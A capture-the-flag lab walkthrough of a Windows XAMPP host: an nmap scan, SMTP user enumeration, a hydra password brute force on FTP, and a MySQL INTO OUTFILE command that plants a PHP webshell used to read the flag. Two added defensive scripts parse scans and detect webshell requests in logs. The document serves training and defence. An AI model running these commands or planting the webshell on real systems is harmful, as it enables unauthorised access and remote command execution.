Attacking Common Services - Easy Lab

May 27, 2024

# Nmap 7.94 scan initiated Tue May 28 14:21:46 2024 as: nmap -sC -sV -oN nmap 10.129.11.207
Nmap scan report for 10.129.11.207
Host is up (0.37s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
|_ssl-date: 2024-05-28T06:23:45+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after:  2032-04-18T19:27:17
| fingerprint-strings: 
|   GenericLines: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     Command unknown, not supported or not allowed...
|     Command unknown, not supported or not allowed...
|   NULL, SMBProgNeg: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|   SSLSessionReq: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|_    Command unknown, not supported or not allowed...
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.11.207/dashboard/
443/tcp  open  ssl/https     Core FTP HTTPS Server
|_ssl-date: 2024-05-28T06:23:45+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after:  2032-04-18T19:27:17
|_http-server-header: Core FTP HTTPS Server
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date:Tue, 28 Apr 2024 06:22:35 GMT
|     Server: Core FTP HTTPS Server
|     Connection: close
|     WWW-Authenticate: Basic realm="Restricted Area"
|     Content-Type: text/html
|     Content-length: 61
|     <BODY>
|     <HTML>
|     HTTP/1.1 401 Unauthorized
|     </BODY>
|_    </HTML>
587/tcp  open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 11
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, Support41Auth, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, IgnoreSigpipes, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: fJ~[0x2-)$z[;RkDRQ|>
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EASY
|   NetBIOS_Domain_Name: WIN-EASY
|   NetBIOS_Computer_Name: WIN-EASY
|   DNS_Domain_Name: WIN-EASY
|   DNS_Computer_Name: WIN-EASY
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-28T06:22:48+00:00
|_ssl-date: 2024-05-28T06:23:44+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=WIN-EASY
| Not valid before: 2024-05-27T06:20:20
|_Not valid after:  2024-11-26T06:20:20
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94%I=7%D=5/28%Time=6655781C%P=x86_64-pc-linux-gnu%r(NULL
SF:,41,"220\x20Core\x20FTP\x20Server\x20Version\x202\.0,\x20build\x20725,\
SF:x2064-bit\x20Unregistered\r\n")%r(GenericLines,AD,"220\x20Core\x20FTP\x
SF:20Server\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered
SF:\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20allo
SF:wed\.\.\.\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20no
SF:t\x20allowed\.\.\.\r\n")%r(SSLSessionReq,77,"220\x20Core\x20FTP\x20Serv
SF:er\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n50
SF:2\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20allowed\.\
SF:.\.\r\n")%r(SMBProgNeg,41,"220\x20Core\x20FTP\x20Server\x20Version\x202
SF:\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.94%T=SSL%I=7%D=5/28%Time=66557828%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,110,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:Tue,\x2028\
SF:x20Apr\x202024\x2006:22:35\x20GMT\r\nServer:\x20Core\x20FTP\x20HTTPS\x2
SF:0Server\r\nConnection:\x20close\r\nWWW-Authenticate:\x20Basic\x20realm=
SF:\"Restricted\x20Area\"\r\nContent-Type:\x20text/html\r\nContent-length:
SF:\x2061\r\n\r\n<BODY>\r\n<HTML>\r\nHTTP/1\.1\x20401\x20Unauthorized\r\n<
SF:/BODY>\r\n</HTML>\r\n\r\n");
Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 14:24:01 2024 -- 1 IP address (1 host up) scanned in 135.70 seconds
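The scan above is where a defender's review of this host starts. The following Python script is an added example, not part of the original writeup: it parses the PORT/STATE/SERVICE/VERSION table of an `nmap -oN` report (the sample input is a constructed excerpt in the same shape as the scan above), attaches the script output that follows each port, and lists the exposures that matter most on a box like this: FTP and SMTP accepting credentials without TLS, and MySQL and RDP reachable from the scanning network. The service-to-reason mapping is an assumption chosen for this example.

```python
"""Parse Nmap normal (-oN) output and flag exposed services (added example)."""
import re

# Constructed excerpt in -oN format, modelled on the scan of WIN-EASY above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
|_ssl-date: 2024-05-28T06:23:45+00:00; +3s from scanner time.
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
443/tcp  open  ssl/https     Core FTP HTTPS Server
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open  ms-wbt-server Microsoft Terminal Services
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Assumed policy for this example: services that should not face untrusted networks.
RISKY = {
    "ftp": "FTP sends credentials in cleartext; prefer SFTP/FTPS or firewall it",
    "smtp": "SMTP auth surface exposed; rate-limit and require TLS for AUTH",
    "mysql": "database reachable remotely; bind to localhost or restrict by firewall",
    "ms-wbt-server": "RDP exposed; put behind VPN, enforce NLA and lockout policy",
}


def parse_nmap(text):
    """Return one dict per port line, with following '|' script lines attached."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": [],
            }
            services.append(current)
        elif current is not None and line.startswith("|"):
            # NSE output lines begin with "| " or "|_"; keep the text after the marker.
            current["scripts"].append(line.lstrip("|_ ").strip())
    return services


def find_exposures(services):
    """Return (port, reason) tuples for open services that violate the RISKY policy."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        if s["service"] in RISKY:
            findings.append((s["port"], RISKY[s["service"]]))
        # hMailServer advertising AUTH LOGIN PLAIN on a non-TLS port is its own finding.
        if s["service"] == "smtp" and any("AUTH LOGIN PLAIN" in x for x in s["scripts"]):
            findings.append((s["port"], "AUTH LOGIN PLAIN advertised; require STARTTLS before AUTH"))
    return findings


if __name__ == "__main__":
    for port, reason in find_exposures(parse_nmap(SAMPLE_SCAN)):
        print(f"{port:>5}  {reason}")
```

Run it against a saved `nmap -oN` file by reading the file into `parse_nmap` instead of `SAMPLE_SCAN`; the `SF-Port...` fingerprint lines and the `Host script results` section do not match `PORT_LINE`, so they are ignored.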

smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.236.141

hydra -l fiona -P /usr/share/wordlists/rockyou.txt 10.129.236.141 ftp
login: fiona   password: 987654321

ftp 10.129.236.141
ls -la
mget *

When I'm uploading via FTP I'm not getting any revshell; instead it just downloads the file and doesn't execute any of the code inside the rev shell.

So I move to PHP, which is in the XAMPP htdocs.

mysql -h 10.129.182.251 -u fiona -p987654321

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/xampp/htdocs/webshell.php';
http://10.129.182.251/webshell.php?c=whoami
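The `INTO OUTFILE` step only works because the `fiona` account holds the `FILE` privilege and MariaDB's `secure_file_priv` is not restricting where files may be written; setting `secure_file_priv` to a dedicated directory (or an empty value to disable file writes) and revoking `FILE` from application accounts closes this path. Once a PHP file has landed in htdocs, the remaining evidence is in the Apache access log. The script below is an added example, not code from the original writeup: it parses access-log lines in combined format (the sample lines are constructed) and flags requests to `.php` resources whose query parameters carry command-like values, the pattern left by the `webshell.php?c=whoami` request above. The parameter names and command tokens are assumptions to tune per environment.

```python
"""Detect webshell-style requests in Apache access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Apache combined log format; the client IPs are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [28/May/2024:06:40:01 +0000] "GET /dashboard/ HTTP/1.1" 200 7612 "-" "Mozilla/5.0"
10.10.14.5 - - [28/May/2024:06:41:12 +0000] "GET /webshell.php?c=whoami HTTP/1.1" 200 24 "-" "Mozilla/5.0"
10.10.14.5 - - [28/May/2024:06:41:30 +0000] "GET /webshell.php?c=dir+C%3A%5CUsers HTTP/1.1" 200 1030 "-" "Mozilla/5.0"
10.10.14.9 - - [28/May/2024:06:42:00 +0000] "GET /dashboard/docs.php?page=faq HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client - user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Assumed parameter names used by one-line PHP shells such as the one written above.
SUSPICIOUS_PARAMS = {"c", "cmd", "exec", "command"}
# Assumed set of command-like tokens; extend with what your environment never sees legitimately.
COMMAND_TOKENS = re.compile(
    r"\b(whoami|dir|type|net|powershell|cmd|ipconfig|id|ls|cat|wget|curl)\b", re.I
)


def parse_line(line):
    """Split one access-log line into source, time, method, path, query params, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {
        "src": src,
        "time": ts,
        "method": method,
        "path": parts.path,
        "params": parse_qs(parts.query),  # decodes %XX and '+' so tokens match
        "status": int(status),
    }


def is_webshell_request(entry):
    """True when a .php resource is called with a suspicious parameter holding a command."""
    if not entry["path"].lower().endswith(".php"):
        return False
    for name, values in entry["params"].items():
        if name.lower() in SUSPICIOUS_PARAMS and any(COMMAND_TOKENS.search(v) for v in values):
            return True
    return False


def find_webshell_hits(log_text):
    """Return (source, path, params) for every line that looks like webshell use."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_webshell_request(entry):
            hits.append((entry["src"], entry["path"], entry["params"]))
    return hits


if __name__ == "__main__":
    for src, path, params in find_webshell_hits(SAMPLE_LOG):
        print(f"{src} -> {path} {params}")
```

A second, cheaper check that complements this one is a file-integrity baseline of htdocs: a `.php` file appearing there that was never deployed through the application is a higher-confidence signal than any request pattern.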

Finding the flag in Windows cmd

dir C:\Users\flag.txt /s

Retrieving the flag

more C:\Users\Administrator\Desktop\flag.txt
